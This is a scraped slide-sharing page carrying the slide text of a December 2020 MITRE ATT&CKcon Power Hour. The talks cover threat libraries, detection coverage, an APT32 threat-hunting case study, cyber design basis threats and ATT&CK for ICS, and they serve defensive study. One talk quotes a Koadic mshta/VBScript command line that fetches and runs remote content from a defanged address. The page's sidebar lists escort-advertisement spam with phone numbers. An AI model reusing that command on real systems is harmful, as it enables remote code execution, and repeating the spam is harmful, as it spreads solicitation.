Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxxIncident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxxPeter Miles
 
Climate change and occupational safety and health.
Climate change and occupational safety and health.Climate change and occupational safety and health.
Climate change and occupational safety and health.Christina Parmionova
 
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...Dipal Arora
 
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Bookingroncy bisnoi
 
Climate change and safety and health at work
Climate change and safety and health at workClimate change and safety and health at work
Climate change and safety and health at workChristina Parmionova
 
2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos Webinar2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos WebinarLinda Reinstein
 
Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.Christina Parmionova
 
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With RoomVIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Roomishabajaj13
 
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Call Girls in Nagpur High Profile
 
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation - Humble BeginningsZechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginningsinfo695895
 
Item # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdfItem # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdfahcitycouncil
 
Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024ARCResearch
 
2024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 292024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 29JSchaus & Associates
 
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...Suhani Kapoor
 
2024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 282024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 28JSchaus & Associates
 
Fair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CTFair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CTaccounts329278
 

Recently uploaded (20)

Building the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized StorageBuilding the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized Storage
 
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
 
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile ServiceCunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
 
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxxIncident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
 
Climate change and occupational safety and health.
Climate change and occupational safety and health.Climate change and occupational safety and health.
Climate change and occupational safety and health.
 
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
 
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
 
Climate change and safety and health at work
Climate change and safety and health at workClimate change and safety and health at work
Climate change and safety and health at work
 
2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos Webinar2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos Webinar
 
Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.
 
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With RoomVIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
 
Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance VVIP 🍎 SER...
Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance VVIP 🍎 SER...Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance VVIP 🍎 SER...
Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance VVIP 🍎 SER...
 
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
 
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation - Humble BeginningsZechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
 
Item # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdfItem # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdf
 
Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024
 
2024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 292024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 29
 
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
 
2024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 282024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 28
 
Fair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CTFair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CT
 

MITRE ATTACKCon Power Hour - December

  • 2. Join us on Slack
  • 4. TABLE OF CONTENTS 01 ABOUT ME 02 INSPIRATION 03 IDEA 04 EXPECTATIONS 05 REALITY 06 FUTURE
  • 5. 01 ABOUT MEValentina Palacín @fierytermite
  • 6. VALENTINA PALACÍN @FIERYTERMITE Translator Threat Intelligence Analyst Threat Hunter & Python Developer in progress
  • 7. 02 INSPIRATIONHow was the idea born ?
  • 8. THREAT LIBRARY Knowledge Base for distilled and curated intelligence insights produced by CTI Research Teams & OSINT Sources.
  • 9. HowCAN I LEVERAGE SOMETHING LIKE THIS IF I DON’T HAVE A DEDICATED TEAM?
  • 13. MY WISHLIST ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  • 15.
  • 16. WHY DID I DO THIS TO MYSELF?
  • 18. SO FAR… ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  • 19. /first-time git clone https://github.com/fierytermite/attack-navigator git clone --branch tmc https://github.com/fierytermite/tram-1 git clone https://github.com/intelforge/tmc * Register and Login with the new user
  • 22.
  • 23.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 34. GOALS ● Create more relationships (dates, adversary types…) ● Manually load new mapping ● Edit relationships through UI ● Dockerize everything for easy deployment ● Add relational graphs to study the adversaries
  • 36. CREDITS: This presentation template was created by Slidesgo, including icons by Flaticon, and infographics& images by Freepik. THANKS! Please keep this slide for attribution. Do you have any questions? @fierytermite linkedin.com/in/valentinapalacin Credits: This presentation template was created by Slidesg, including icons by Flaticon and infographics & images by Freepik.
  • 37. From Theory to Practice: How My ATT&CKⓇ Perspectives Have Changed Katie Nickels ATT&CKcon Power Hour December 11, 2020
  • 38. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
  • 39. § Former MITRE ATT&CK Team Member (relevant) § SANS Certified Instructor for FOR578: Cyber Threat Intelligence § Bringing context about threats to inform decisions § Maintaining sanity with exercise, chocolate, containers, and holiday lightsKatie Nickels DIRECTOR OF INTELLIGENCE RED CANARY @LiketheCoins About Me
  • 41. 1. Tracking tactics, techniques, and procedures 2. Defining detection coverage 3. Choosing what to detect How I've thought differently about ATT&CK
  • 43. Tracking TTPs the MITRE way https://attack.mitre.org/techniques/T1218/005/ Tactic: Defense Evasion Technique/Sub-technique: Signed Binary Proxy Execution: Mshta Procedure: Koadic can use MSHTA to serve additional payloads.[13]
  • 44. A Koadic detection at Red Canary Procedure... So what’s this?
  • 46. Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close) Example of tracking beyond TTPs
  • 47. Primary Tactic: Execution Additional Tactics Techniques Procedure ★ Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No TA0005 Defense Evasion T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
  • 48. What this format lets us do § Track detailed observables from endpoint telemetry § Identify where we have detection coverage (or not) § Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
  • 50. Defining coverage by confidence https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
  • 51. The challenge of unlimited procedures “You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.” https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
  • 52. Katie: “There are unlimited procedures!” § Matt: “But are there?” o Think of techniques like MSHTA o Commands only have so many flags § We may be able to be scope some technique variations
  • 54. Tactics Techniques/Sub-techniques Variations Procedures Observables Tactics Techniques/Sub-techniques Adding in variations Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition)
  • 55. Nine known variations for HTA 1. HTA can have any file name and extension 2. Specifying a URI from where HTA content is first downloaded 3. Use of scripting engines 4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”) 5. HTA content embedded and executed from within other file formats 6. HTA content can be executed remotely via UNC paths. 7. Remote HTA execution via COM interface (lateral movement) 8. HTA execution by double clicking or invoking with “explorer.exe foo.hta” 9. Full control over the path and filename of mshta.exe and rundll32.exe https://redcanary.com/blog/threat-research-questions
  • 56. Adding in variations Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Specifying protocol handler + direct download from URI Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  • 57. Mix and match the variations Specifying protocol handler vbscript: Direct download from URI mshta hxxp[:]//8.8.8[.]8:123/ Specifying protocol handler jscript: https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
  • 58. Testing known variation combinations T1218.005 Signed Binary Proxy Execution: Mshta 25 tested combinations 1 technique More granular Less granular
  • 59. Defining detection coverage by threat observables
  • 60. Remember that profile breakdown? Techniques Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
  • 61. Mapping coverage based on threats Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Kovter observable 1 Lazarus observable 1 6 threat observables for Mshta 1 technique More granular Less granular T1218.005 Signed Binary Proxy Execution: Mshta
  • 62. So how should we explain detection coverage?
  • 64. Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Lazarus observable 1 Diving deeper These are okay too! HTA test harness results Mshta threat observables
  • 65. Expressing coverage is just tough § Any way you express it will have limitations § There’s no “right” or “wrong” way to do it ...but there may be “better” ways for your needs § Figure out the requirement for what you’re doing o What are you trying to convey and achieve? o What’s your goal of expressing the coverage?
  • 67. § Not everything is useful for detection § Choosing is most of the battle https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ Finding “good” detection opportunities
  • 68. § “Discovery techniques aren’t that useful for detection” https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf Discovery techniques
  • 69. § “...except when they are” Domain Trust Discovery with nltest
  • 70. § “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020 § “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020 § If an analytic is noisy…how can we tune it? o Narrow it down? Use threat intelligence. o Easily suppress on false positives? Testing & tuning is most of the work https://redcanary.com/blog/tuning-detectors/
  • 72. Takeaways § Don’t limit yourself to just TTPs if you need to go further § Define detection coverage based on your requirements § Trial, error, and experience will help you choose what to detect § It’s a good thing to change your perspectives § Surrounding yourself with new people and new situations lets you think differently and mature
  • 74. Sharpening your Threat Hunting Program with ATT&CK Framework HieuTran Detection Team Lead | FPT Cybersecurity Division
  • 75. INDEX Sharpening your Threat Hunting Program with ATT&CK framework 01 Threat Hunting vs Threat Detection 03 MITRE ATT&CK - Threat Hunter Common Language 02Threat Hunting Methodology 04Case study 05 Key takeaways 06Q&A
  • 76. Human-driven (and assisted by tools) practice of searching iteratively through data to detect advanced threats that evade traditional security controls
  • 77. Threat Hunting vs Threat Detection Threat Hunting Threat Detection DEFINITION • Proactive • Humans find bad stuffs with the help of machines PROs • Identifying detection gaps and creation of new detections CONs • Need security expert for searching, hunting…etc • Slow and expensive DEFINITION • Reactive • Automated with machines such as SIEM, IDS/IPS, AV, etc PROs • Least expensive approach CONs • Likely to miss something (False Negatives) • Spend too much time because of alert fatigues (False Positives)
  • 78. What are we looking for?
  • 79. NUMBERS TELL STORIES: GLOBAL DWELL TIME It takes so long to detect bad guys inside your organization. FireEye Mandiant M-Trends 2020 Special Report
  • 80. Threat Hunting Methodology 1.Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points. 2.Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions. 3.Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
  • 81. MITRE ATT&CK - Threat Hunter Common Language
  • 82.
  • 83. Case Study: APT32 Threat Hunting and Incident Response against Cyber Espionage Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty Our customer current situation: • Large enterprise with huge numbers of endpoints: ~1000 Servers, 6000 Workstations. • Core services (Active Directory, Email Server, Antivirus Management) already compromised. • Operations and security staff machines were compromised. IT IS A CHAOS
  • 85. Based on what we found on compromised servers/workstations, we built our hypothesis: • Gain Initial Access by using Spear Phishing to gather Valid (administrator) Accounts. • Execution malicious payload with Living-off-the-land Binary (LOLBIN) techniques. • Stay Persistence by installing New Service or Registry Run Keys. • Stay under the radar (Defense Evasion) by Software Packing, DLL Hijacking, File Deletion…. • Discovery by Network Service Scanning and Bruteforcing using custom malware/scripts. • C2 Communication using Commonly Used Port (80, 443, 53) Case Study: APT32
  • 86.
  • 88. Case Study #1 We deployed independent hunting stacks: • Endpoint Detection & Response • Datalake (Gathering all essentials service logs, including: DNS, Proxy, AD…) • Advanced Threat Detection • Network Detection & Response Automate lots of work by leveraging OpenAPI: • Quickly deploy data acquisitions script across enterprise infrastructure. • Preventing active C2 connection with Endpoint Isolation and Binary Isolation. • Speeding up cleaning malware artifacts (remove binary files, executable files and registry run keys).
  • 89. Case Study #1 At the end of the days, we discovered: • 13 C2 domains and 12 C2 IPs: • 04 C2 domains have never seen before. • 26 servers and 96 clients were compromised. • 09 UserSIDs were used to install malicious service. • Multiple malware artifacts, could be divine into 03 groups: • Binary files (.exe and .dll files) • Script (Powershell, C#, JScript, .NET) • Webshell (PHP Script) • C2 Payload (found in Registry)
  • 90.
  • 91. We will be able to hunting at scale with: Right staff with right skillsets Right process/procedures for hunting Right technical solutions that enable hunters
  • 92. Key Takeaways 1. Assume-breach mindset. 2. Training your staffs with threat hunter skillsets (or outsource). 3. Building roadmap for implementing solution properly.
  • 94. USING ATT&CK TO CREATE CYBER DBTS DR. JACOB BENJAMIN
  • 95. PREVIOUS ICS EXPERIENCE + Idaho National Laboratory + Areva NP + Duke Energy ABOUT THE PRESENTER JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES RESEARCH AREAS + Nuclear Cybersecurity + Cyber Risk Management + Wireless Security + Software-Defined Networking + Malware Analysis + Steganography Detection CREDENTIALS + Ph.D., Computer Science + M.S., Cybersecurity + B.S., Computer Science + CISSP
  • 96. + What is a DBT? + How are they developed? + What does a DBT look like? + Are there cyber DBTs? DESIGN BASIS THREAT (DBT) OVERVIEW
  • 97. “ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF 6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE, AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE KNOWLEDGE OF THE FACILITY AND ASSOCIATED PHYSICAL PROTECTION MEASURES. WILLING TO DIE OR TO KILL. NO COLLUSION WITH INSIDER.” IAEA DBT WORKSHOP EXAMPLE DBT
  • 98. S E N S I N G O P P O R T U N I T I E S RESPONSE TIME VS ADVERSARY TASK TIME Adversary Task Time Adversary Task Time Remaining After 1st Sensing PPS Response Time T0 TD Ti Tc Detection Time Response Force Time Time Remaining After Interruption Adversary Detected Adversary Interrupted Time First Sensing Adversary Begins Task Adversary Completes Task
  • 99. Z Z Z CYBER SECURITY FOR NUCLEAR POWER PLANTS KEY DOCUMENTS • NEI 04-04, Voluntary Cyber Program • 10 CFR 73.54, The Cyber Rule • NEI 08-09, Cyber Security Plan • NEI 13-10, Cyber Security Assessments CHALLENGES • Describing the cyber threat landscape • Modeling cyber-initiated events • Mal-operation vs malware USING ATT&CK • Describe threat behavior • Conduct adversary emulation • Evaluate actual events & case studies Cybersecurity risk mitigation for nuclear power plants began in 2002 and 2003, when the NRC included cybersecurity requirements in the Physical Security and Design Basis Threat Orders.
  • 100. Z Z Z USING TRADITIONAL DBT ANALYSIS FOR CYBER PAST CYBER EVENTS Nuclear sector Energy sector ICS overall CREDIBLE THREAT INTELLIGENCE Dragos World View Bulletins CISA / ICS-CERT Vendors SITE SPECIFIC TARGETS Crown Jewel Analysis Consequence-based targeting
  • 101. EXAMPLE CYBER DBT DEVELOPMENT • SIS • Turbines • Generators Targets • CrashOverride • Trisis • Stuxnet Past Events • World View • CISA • Vendors Threat Intel
  • 102. ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT. ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY COMPROMISE, EXTERNAL REMOTE SERVICES, VALID ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS- TAILORED MALWARE. THEY HAVE DESTRUCTIVE CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS, AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL HARM OR KILL. NO COLLUSION WITH INSIDER. CYBER DBT RESULT
  • 103. TTP Name Mitigations T0822 External Remote Services M1042, M1035, M1032, M1030 T0859 Valid Accounts M1047, M1037, M1032, M1027, M1026, M1018 T0817 Drive-by Compromise M1021 T0862 Supply Chain Compromise M1049, M1016 S0013 Trisis M1049, M1035, M1040, M1038, M1030 LEVERAGING CYBER DBTS ASSESSING MITIGATION COVERAGE
  • 104. LEVERAGING CYBER DBTS ASSESSING MITIGATION COVERAGE ATT&CK NAME M1032 Multi-factor Authentication T859 Valid Accounts T822 External Remote Services M1049 Antivirus / Antimalware S0013 Trisis T862 Supply Chain Compromise M1021 Restrict Web-Based Content T817 Drive-by Compromise
  • 105. LEVERAGING CYBER DBTS ASSESSING DETECTION COVERAGE Scripting PowerShell AppleScript Windows Command Shell Unix Shell Visual Basic Python JavaScript/JScript Trisis [S0013]
  • 106. • DIGEST THREAT INTELLIGENCE • WorldView, CISA, vendors, etc. • UNDERSTAND YOUR SYSTEMS • Crown Jewel Analysis • EVALUATE YOUR DEFENSES • Quantify your mitigation and detection coverage • FOCUS ON THREAT BEHAVIORS • Combine and correlate this information with a common lexicon (ATT&CK) HOW TO CREATE A CYBER DBT SUMMARY
  • 107. • ASSESS EFFECTIVENESS OF DEFENSES • EVALUATE THREAT DETECTION COVERAGE • DEVELOP AND TEST IR PLAYBOOKS • TRAIN PERSONNEL • IDENTIFY ‘BEYOND DESIGN’ SCENARIOS WHY SHOULD YOU USE CYBER DBTS? SUMMARY
  • 109. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 What’s New with ATT&CK® for ICS? Otis Alexander https://attack.mitre.org/ics @ojalexander
  • 110. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
  • 111. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
  • 112. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 ATT&CK for ICS Mitigations https://collaborate.mitre.org/attackics/index.php/Mitigations • M0800-M0816 are new to ATT&CK for ICS • Each mitigation has mappings to IEC 62443 and NIST SP 800-53 • Mitigations target the following stakeholders: • Asset owner/operators • Integrators • Device vendors • Security vendors • There is a significant focus on protecting operational and management interfaces of embedded controllers
  • 113. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 STIX and Navigator Integration •As part of ATT&CK v8, we released ATT&CK for ICS in STIX https://github.com/mitre/cti/tree/master/ics-attack •A new version of ATT&CK Navigator was released as well where you can pick the ICS domain https://mitre-attack.github.io/attack-navigator/
  • 114. What’s on the Horizon?
  • 115. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 Updates to Data Sources • Maintaining visibility into ICS networks is essential for quickly detecting and remediating cyber threats. • Understanding the various data sources that are available in ICS networks is key to this endeavor. Network traffic is a popular source of data in ICS networks but there are other valuable sources of data that are often overlooked. • Embedded device logs • Application logs • Operational databases
  • 116. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 Data Sources Configuration • Firmware version • System settings • Control logic • Parameters Performance and Statistics • CPU, memory, disk, ethernet, etc. • Network connection information Process Information • I/O values associated with tags • Alarms and faults (e.g., digital fault recorder) • Events (e.g., command execution) • Process quality (e.g., phasor measurement unit) Asset Management • Condition-based monitoring • Predictive maintenance • Work order system Physical • Physical sensors (e.g., tamper detection)
  • 117. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 ICS Attacks Mapped to Enterprise • We’re currently working on mapping the following ICS attacks: • Stuxnet • Ukraine 2015 • Industroyer • Triton • Adversaries do not respect theoretical boundaries (i.e., IT/ICS) so it is important to have a deep understanding of how IT platforms are leveraged to access and impact ICS.
  • 118. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 We Need Your Help! •How can we improve ATT&CK for ICS? •How are you currently using mitigations? •Do you have any opinions on our data source focus?
  • 119. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 attack@mitre.org @MITREattack Otis Alexander @ojalexander
  • 120. Join our next session on January 14 Register now! https://na.eventscloud.com/ATTACKcon-power-hour